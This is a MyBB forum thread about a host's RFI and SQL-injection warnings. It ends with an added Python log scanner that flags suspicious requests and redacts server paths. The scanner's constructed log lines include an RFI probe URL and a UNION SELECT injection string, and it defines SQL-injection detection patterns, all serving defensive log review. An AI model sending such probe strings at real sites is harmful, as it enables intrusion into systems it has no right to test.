MyBB Community Forums

Full Version: SQL Injection
Hello.

My host is reporting to me that my site has some weird things related to RFI (Remote File Inclusion) and SQL Injection.

Well, my website doesn't have a login or any other validation, just my forums, which use MyBB 1.6.5.

I remember that some days ago I changed a php.ini config that was:

allow_url_fopen

It was "off" and I changed it to "on" to test something. Well, I forgot it as "on" and, as I posted some days ago, people started with a mass login into my forum, so I just set it to "off" again and it LOOKS LIKE that problem stopped.

I'm not that good with web programming and they gave me some logs about those RFI and SQL Injection, but I couldn't understand them, so if someone would like to check them I can send them via PM since they contain some folders from my server etc.

I don't believe that MyBB has the SQL Injection vulnerability, but in any case it's better to confirm.

Thank you
Your post roughly translates to "I believe there is a monster under my bed". A more accurate translation would be "I believe there is a monster" because you didn't even give enough information to venture a vague guess such as "under the bed" or "in the cupboard" or whatever. In other words it's completely and utterly pointless.

It would help if you could actually put any information into your post that would point to either a file or query or error message or malformed request or whatever. Then maybe someone could tell you if it's MyBB, or a plugin, or just funny bots doing injection-looking requests for no fathomable reason or what.
I found the guy who was crashing the forum with multiple access; he told me that he was just sending a lot of requests to a single page, so my host blocked the forum because of the max_users_connection.

The point is about that thing of RFI and SQL Injection, and as I said I can send the log files that my host sent to me, because I won't post them in public.
It's DDoS, I believe. Overloading the server (your host) with too many requests, causing it to shut down.
(2012-01-24, 12:33 AM) maozao Wrote: The point is about that thing of RFI and SQL Injection, and as I said I can send the log files that my host sent to me, because I won't post them in public.

Then we cannot help you. I would suggest that you post the portion of your log file in question to the Private Inquiries forum and ask for help there. Only you and staff can read your posts there, so it's not in public.
Sorry about my earlier comment, then. Seems I've missed the bit with the log files. :)
Or you could copy a portion of the log and edit out any details in it (/home/real could be changed to /home/myhomedir).
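The "RFI and SQL Injection" entries a host sends over are usually web-server requests that tripped a pattern filter, and the two practical problems in this thread are reading them and sharing them without exposing server paths. The script below is an added example written for this thread, not code from the forum, from MyBB or from the host. It parses a few constructed Apache combined-format access-log lines, flags query parameters whose value is a remote URL (the shape of a remote-file-inclusion attempt, which only works if PHP's allow_url_fopen and, for include(), allow_url_include permit it) or that contain common SQL-injection markers, and masks /home/<user> paths the way the last reply suggests before a log is posted publicly. All IPs, hostnames and log lines are constructed placeholders, and the patterns are heuristics, not a full ruleset.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache "combined" access-log lines (placeholders, not the
# thread's real logs). One is benign, one looks like an RFI probe, one
# looks like a SQL-injection probe.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [24/Jan/2012:00:10:01 +0000] "GET /forum/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Jan/2012:00:10:07 +0000] "GET /forum/misc.php?action=help&page=http://example.invalid/x.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.8"',
    '198.51.100.2 - - [24/Jan/2012:00:10:09 +0000] "GET /forum/showthread.php?tid=1%27%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 3303 "-" "Mozilla/5.0"',
]

# Constructed PHP error-log line containing a server path worth hiding.
SAMPLE_ERROR_LINE = (
    '[Tue Jan 24 00:10:11 2012] [error] [client 198.51.100.2] PHP Warning: '
    'include(http://example.invalid/x.txt): failed to open stream '
    'in /home/realuser/public_html/forum/misc.php on line 12'
)

# Request line and status code inside a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# A parameter value that is itself a remote URL: the RFI indicator.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Common SQL-injection markers: UNION ... SELECT, quote-then-boolean, trailing comment, sleep().
SQLI_RE = re.compile(
    r"(?:\bunion\b.{0,20}\bselect\b|'\s*(?:or|and)\s+[\w']+\s*=\s*[\w']+|--\s*$|\bsleep\s*\()",
    re.IGNORECASE | re.DOTALL,
)
# Account home directories to mask before sharing a log.
HOME_PATH_RE = re.compile(r'/home/[^/\s]+')


def split_query(target):
    """Return (path, [(name, decoded_value), ...]) for a request target."""
    path, _, query = target.partition('?')
    params = []
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, value = pair.partition('=')
        params.append((unquote_plus(name), unquote_plus(value)))
    return path, params


def classify_request(target):
    """Return (indicator, param, value) findings for one request target."""
    _, params = split_query(target)
    findings = []
    for name, value in params:
        if REMOTE_URL_RE.match(value):
            findings.append(('rfi', name, value))
        if SQLI_RE.search(value):
            findings.append(('sqli', name, value))
    return findings


def scan_access_log(lines):
    """Return (client, status, indicator, param, value) for every suspicious parameter."""
    results = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        client = line.split(' ', 1)[0]
        for indicator, name, value in classify_request(m.group('target')):
            results.append((client, m.group('status'), indicator, name, value))
    return results


def redact(line, replacement='/home/REDACTED'):
    """Mask home-directory names so a log excerpt can be posted publicly."""
    return HOME_PATH_RE.sub(replacement, line)


if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
    print(redact(SAMPLE_ERROR_LINE))
```

A flagged line only shows that something was attempted, not that it worked: check the status code and response size of the request, and whether the MyBB script named in the path actually uses that parameter, since bots spray requests like these at every site regardless of software.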